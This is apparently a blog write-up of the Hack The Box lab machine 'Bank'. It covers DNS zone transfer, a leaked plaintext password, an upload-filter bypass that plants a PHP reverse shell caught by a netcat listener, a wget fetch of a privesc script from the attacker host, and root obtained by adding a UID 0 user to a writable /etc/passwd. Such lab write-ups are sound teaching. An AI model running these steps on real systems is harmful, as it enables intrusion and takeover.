# Enumeration
### NMAP
The nmap scan reveals port 53, 80 and 22 open so we could assume that there is an http web application, DNS and ssh services. Let's enumerate the DNS and check out the findings in our browser.
Host is up (0.047s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
### [DNS Enumeration](https://medium.com/@klockw3rk/back-to-basics-dns-enumeration-446017957aa3)
# dig axfr @10.10.10.29 bank.htb
; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.29 bank.htb
; (1 server found)
;; global options: +cmd
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb. 604800 IN NS ns.bank.htb.
bank.htb. 604800 IN A 10.10.10.29
ns.bank.htb. 604800 IN A 10.10.10.29
www.bank.htb. 604800 IN CNAME bank.htb.
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 47 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Tue May 11 03:28:16 EDT 2021
;; XFR size: 6 records (messages 1, bytes 171)
# Web App Enumeration
#### /etc/hosts
Add the IP address to our known hosts file in /etc/hosts as:
10.10.10.29 bank.htb chris.bank.htb ns.bank.htb
#### chris.bank.htb bank.htb ns.bank.htb
#### Dirbuster
A couple of interesting directories were found for http://bank.htb including not present in the picture /balance-transfer/ directory.
*user* and *ticket* files does not return anything but footer on the other hand:
#### /balance-transfer/
Balance transfer is directory which contains a bunch of encrypted accounts. While scrolling through the directory, looking for something out of the ordinary, I found a file that is 50% smaller than the rest of the files.
When opened, It seems that encryption failed since it is in plain text:
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: Christos Christopoulos
Email: [email protected]
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
# Exploit
I have logged in to the given account and discovered a Support page which provides file upload functionality which reveals a possible attack surface.
## LFI
The file upload has restrictions in place that prevent me from uploading anything other than images. Let's bypass that with burp suite.
#### Burp Suite
After configuring our *php-reverse-shell.php* from pentestmonkey, we try to upload it into the file upload form while having *intercept on*. After we capture the POST request, we send it to Repeater in order to debunk the restrictions in place. And voila...
## Shell
Open a nc listener that will intercept the reverse call and execute the file.
$ curl "http://bank.htb/uploads/php-reverse-shell.php.jpeg" |php
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5492 100 5492 0 0 53843 0 --:--:-- --:--:-- --:--:-- 53843
PHP Notice: Undefined variable: daemon in Standard input code on line 184
Successfully opened reverse shell to 10.10.14.3:1234
***yikes***, I just hacked myself 😄
Anyway... let's try to forget about that and figure out my next move. I read in the source code that the developer added an exception for the ***htb*** extension for debugging purposes and that files with such extension will be executed as php. So I have uploaded the reverse shell as an htb and just opened it which returned a shell.
# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 58982
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
12:37:52 up 2:18, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
# Privilege EscalationWe are logged as www-data. In order to figure out our attack surface, I will run a script called unix-privesc-check. In the following lines, I am going to folder /tmp because it is writeable directory and download the file from my local kali system.
┌──(kali㉿kali)-[~/bank]
└─$ sudo cp /usr/share/unix-privesc-check/unix-privesc-check .
┌──(kali㉿kali)-[~/bank]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.29 - - [11/May/2021 05:40:44] "GET /unix-privesc-check HTTP/1.1" 200 -
10.10.10.29 - - [11/May/2021 05:41:21] "GET /unix-privesc-check HTTP/1.1" 200 -
$ cd tmp
$ touch file
$ ls
file
vmware-root
$ wget http://10.10.14.3:8000/unix-privesc-check
--2021-05-11 12:45:15-- http://10.10.14.3:8000/unix-privesc-check
Connecting to 10.10.14.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36801 (36K) [application/octet-stream]
Saving to: 'unix-privesc-check'
0K .......... .......... .......... ..... 100% 654K=0.05s
2021-05-11 12:45:16 (654 KB/s) - 'unix-privesc-check' saved [36801/36801]
$
Let's upgrade out session to be more intuitive and responsive.
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bank:/tmp$ export TERM=xterm
export TERM=xterm
www-data@bank:/tmp$ ^Z
zsh: suspended nc -nlvp 1234
┌──(root💀kali)-[/home/kali/bank]
└─# stty raw -echo;fg 148 ⨯ 1 ⚙
[1] + continued nc -nlvp 1234
Now I have tab-completion and all keys register as normal.
www-data@bank:/tmp$ chmod +x unix-privesc-check
www-data@bank:/tmp$ ./unix-privesc-check standard
...[snip]...
############################################
Checking if anyone except root can change /etc/passwd
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd
Ok, so we have a writeable /etc/passwd file. Let's add a privileged user and escalate. Firstly, create a password:
$ openssl passwd -1 -salt hacker hacker
$1$hacker$TzyKlv0/R/c28R.GAeLw.1
Next, add the user as follows:
www-data@bank:/$ nano /etc/passwd
#################################
add the user in the document like so:
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
#################################
www-data@bank:/$ su hacker
Password:
root@bank:/# whoami
root
root@bank:/#
0 Comments
Recommended Comments
Няма коментари